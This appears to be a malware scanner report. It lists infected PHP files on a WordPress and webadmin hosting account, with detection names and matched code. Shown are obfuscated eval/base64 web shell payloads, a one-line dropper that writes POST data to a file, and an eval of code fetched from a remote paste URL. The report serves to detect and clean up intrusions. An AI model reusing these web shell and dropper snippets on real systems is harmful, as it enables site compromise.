Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LAve`
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/webadmin.turtlesys.net/V6isvoE7BuR.php

Size: 38.68 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/webadmin.turtlesys.net/theme-inslbnx.php

Size: 338.00 B Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/webadmin.turtlesys.net/y2RPAHiNozY.php

Size: 43.51 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/webadmin.turtlesys.net/okp4v2DEf36.php

Size: 166.77 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/webadmin.turtlesys.net/u4kvzQbgYI3.php

Size: 51.33 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/webadmin.turtlesys.net/WRiZdajECck.php

Size: 38.68 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/webadmin.turtlesys.net/theme-insimyx.php

Size: 338.00 B Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/network/wp-term.php

Size: 335.00 B Created: 2024-06-01 02:41:01 Modified: 2024-06-01 08:12:22 Warns: 1

Description	Match
Function eval Line: 15 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval("$ok" . get('https://paste.myconan.net/495929.txt'))`

/custdata02/turtle/public_html/wp-admin/network/wp/iXxBc.php

Size: 2.47 kB Created: 2024-06-01 06:19:57 Modified: 2024-06-01 08:12:22 Warns: 1 Dangers: 1

Description	Match
Function eval Line: 60 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval('?>' . $a)`
Sign 11413268 Line: 60 Dangerous Malware Signature (hash: 11413268)	`<?php eval('?>`

/custdata02/turtle/public_html/wp-admin/network/theme-insxbkl.php

Size: 338.00 B Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/network/theme-insltcm.php

Size: 341.00 B Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/nykq7LRZemH.php

Size: 44.05 kB Created: 2024-06-01 02:24:24 Modified: 2024-06-01 08:12:22 Warns: 1 Dangers: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval($YMAes($BViZn($uHQOv('==wOpkSKpkSKpkSKpkSKpkSKpkSKpkSKdhDMwADMrBzWdNKxbZUWO9kQZRFJogkQt9WWJ1ESYdzUhFXUBVUWV9FK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmcoknbpJHK55WayhSeulmc9tTKpkSKaF3bYF1XkgiWmN3afhybHNVOwMnRfRCKydmb5NXY21GdokmclV2ZmBSYlh2ZyV2Ovd0U5AzcG9FJ552bilHd7gXWLx2a5Y2TfRSeu9mY5R3epoVcvhVUfRCKIJUbvlVSNhEW3MVYxFVQFlVVfBSYiZ3ZwFGaztTX3ADMwsGMb11oEvlRZ50TClFVk0zbHNVOwMnRfRyOdZDMwsGMb11oEvlRZ50TClFVk0DeZtEbrljZP9FJ9tTYy...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-admin/zfcecyiyn.php

Size: 166.77 kB Created: 2024-06-03 08:47:23 Modified: 2024-06-03 08:47:23 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/wp-admin/prsuwyvc.php

Size: 15.07 kB Created: 2024-06-03 23:44:56 Modified: 2024-06-03 23:44:56 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 1 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtduPDVW1NMQUJPTEckKE45ZFU0RnlLdG9wUUpRckptRF8obGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmV9OykpKSl6dm5yQWY3U2lfJChUOWVPXyhIUFU1Y01yXyQoZXRhbGZuaXpnKHZlcnJ0cyBucnV0ZXI7SFBVNWNNcl8kbGFib2xnO0JUYTdNXyRsYWJvbGd7KXp2bnJBZjdTaV8kKE45ZFU0RnlLdG9wUUpRckptRF8gbm9pdGNudWY7XTcwMDB4MFtduPDVW1NMQUJPTEckPUhQVTVjTXJfJDtdNjAweDBbXbjw1VtTTEFCT0xHJD1CVGE3TV8kfTthWWQyc18kIG5ydXRlcjspKSldNTB4MFtduPDVW1N...

Function eval Line: 1 Warning

Potentially dangerous function `eval`

<?php eval($ImBdO($mjPQZ('OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtduPDVW1NMQUJPTEckKE45ZFU0RnlLdG9wUUpRckptRF8obGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmV9OykpKSl6dm5yQWY3U2lfJChUOWVPXyhIUFU1Y01yXyQoZXRhbGZuaXpnKHZlcnJ0cyBucnV0ZXI7SFBVNWNNcl8kbGFib2xnO0JUYTdNXyRsYWJvbGd7KXp2bnJBZjdTaV8kKE45ZFU0RnlLdG9wUUpRckptRF8gbm9pdGNudWY7XTcwMDB4MFtduPDVW1NMQUJPTEckPUhQVTVjTXJfJDtdNjAweDBbXbjw1VtTTEFCT0xHJD1CVGE3TV8kfTthWWQyc18kIG5ydXRlcjsp...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-admin/ugwqqzxt.php

Size: 19.06 kB Created: 2024-06-03 23:45:11 Modified: 2024-06-03 23:45:11 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...
Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($Shgrt($sJhXG($LNuWx($DesQW('rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...
Function str_rot13 eval_str_rot13 Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php RinY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/function.php

Size: 14.78 kB Created: 2022-03-06 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Sign 00f56a27 Line: 80 Dangerous Malware Signature (hash: 00f56a27)	`<?php $___ =`

/custdata02/turtle/public_html/wp-admin/zwkkltwb.php

Size: 15.21 kB Created: 2024-06-04 09:52:11 Modified: 2024-06-04 09:52:11 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 1 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDBrMFtduPDVW0ZZTk9CWVQkKEE5cUg0U2xYZ2JjRFdEZVd6UV8oeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXJ9OykpKSltaWFlTnM3RnZfJChHOXJCXyhVQ0g1cFplXyQocmdueXNhdm10KGlyZWVnZiBhZWhncmU7VUNINXBaZV8keW5vYnl0O09HbjdaXyR5bm9ieXR7KW1pYWVOczdGdl8kKEE5cUg0U2xYZ2JjRFdEZVd6UV8gYWJ2Z3BhaHM7XTcwMDBrMFtduPDVW0ZZTk9CWVQkPVVDSDVwWmVfJDtdNjAwazBbXbjw1VtGWU5PQllUJD1PR243Wl8kfTtuTHEyZl8kIGFlaGdyZTspKSldNTBrMFtduPDVW0Z...

Function eval Line: 1 Warning

Potentially dangerous function `eval`

<?php eval($BtYIG($HJEKh($BINAc('OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDBrMFtduPDVW0ZZTk9CWVQkKEE5cUg0U2xYZ2JjRFdEZVd6UV8oeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXIoeW5pcih5bmlyKHluaXJ9OykpKSltaWFlTnM3RnZfJChHOXJCXyhVQ0g1cFplXyQocmdueXNhdm10KGlyZWVnZiBhZWhncmU7VUNINXBaZV8keW5vYnl0O09HbjdaXyR5bm9ieXR7KW1pYWVOczdGdl8kKEE5cUg0U2xYZ2JjRFdEZVd6UV8gYWJ2Z3BhaHM7XTcwMDBrMFtduPDVW0ZZTk9CWVQkPVVDSDVwWmVfJDtdNjAwazBbXbjw1VtGWU5PQllUJD1PR243Wl8kfTtuTHEyZl8kIGFla...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-admin/item.php

Size: 31.56 kB Created: 2022-04-05 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 9 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php "5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxCR3BCvfdIHB...

Function eval Line: 9 Warning

Potentially dangerous function `eval`

<?php eval(Ccll("5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxC...

Sign e996cf12 Line: 3 Dangerous

Malware Signature (hash: e996cf12)

<?php $DEV=gzinflate(base64_decode($DEV));
 for($i=0;$i<strlen($DEV);$i++)
 {
$DEV[$i] = chr(ord($DEV[$i])-1);
 }
 return $DEV;
 }eval(Ccll(

/custdata02/turtle/public_html/wp-admin/unZIPpeRlqp.php

Size: 24.22 kB Created: 2024-06-04 09:52:40 Modified: 2024-06-04 09:52:40 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+6TC2ixLtsjW6AchJYeBhehAEnq/XDZ4Um...
Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($gqsmw($XIJCA($oxXtM($kAzSn('Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+...
Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php CeXE`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/wxsctlwm.php

Size: 14.61 kB Created: 2024-06-04 16:34:32 Modified: 2024-06-04 16:34:32 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 1 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'gKcyoS7OxdJM2L6MzqzBzMxMCmCR/WzMzMx+fk3oZGCSmZmfzWzMXqz89+oAnTqUJzzy7E/3qyIKaGc1ed7HYGJcuoZm0AaV2pVE6Bkd7sPAIgWVIRUOHAWVFIyQIylFwg/pjgYnjLXJMhzzwLnEyBnwzLnBa1WnDIyZIRSq/6/GtSFD1ZYG0D5b/wsVS9VK3Os8o9j3o2fUFmfGIjgnSmqGS1qaJudFTQvjsj4RWgPXD9HfhBFKD2N/cY1Itiu1I4/Rjko/+Zt3OjsmAJZ7rXskYIf2AlpXn47sk/y/KxrhmjBRujV+OLht3xGU/hFYOlGVkB/EOzZROYl3ddcpoF9jevS83S93wcM2iivZhF6XyBGdnyqZzHm4/VPckqmBouY6rp6CL3a/TVyDcCAmy/Q7UCZfaTlBw/JYVRKr9iu16KpNQK8Y4+6OH+viO08KFyGbjhMDxqG4fTmCNT2OrAI8Uz2FvJRdVj6Mq5x8LytNwr62OrW...

Function eval Line: 1 Warning

Potentially dangerous function `eval`

<?php eval($UdNLr($UtTAl($iTtOf('gKcyoS7OxdJM2L6MzqzBzMxMCmCR/WzMzMx+fk3oZGCSmZmfzWzMXqz89+oAnTqUJzzy7E/3qyIKaGc1ed7HYGJcuoZm0AaV2pVE6Bkd7sPAIgWVIRUOHAWVFIyQIylFwg/pjgYnjLXJMhzzwLnEyBnwzLnBa1WnDIyZIRSq/6/GtSFD1ZYG0D5b/wsVS9VK3Os8o9j3o2fUFmfGIjgnSmqGS1qaJudFTQvjsj4RWgPXD9HfhBFKD2N/cY1Itiu1I4/Rjko/+Zt3OjsmAJZ7rXskYIf2AlpXn47sk/y/KxrhmjBRujV+OLht3xGU/hFYOlGVkB/EOzZROYl3ddcpoF9jevS83S93wcM2iivZhF6XyBGdnyqZzHm4/VPckqmBouY6rp6CL3a/TVyDcCAmy/Q7UCZfaTlBw/JYVRKr9iu16KpNQK8Y4+6OH+viO08KFyGbjhMDxqG4fTmCNT2OrAI8U...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-admin/cvburjic.php

Size: 19.06 kB Created: 2024-06-04 16:35:54 Modified: 2024-06-04 16:35:54 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...
Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($Shgrt($sJhXG($LNuWx($DesQW('rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...
Function str_rot13 eval_str_rot13 Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php RinY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/weuponfc.php

Size: 14.74 kB Created: 2024-06-04 16:38:38 Modified: 2024-06-04 16:38:38 Warns: 2 Dangers: 2

Description	Match
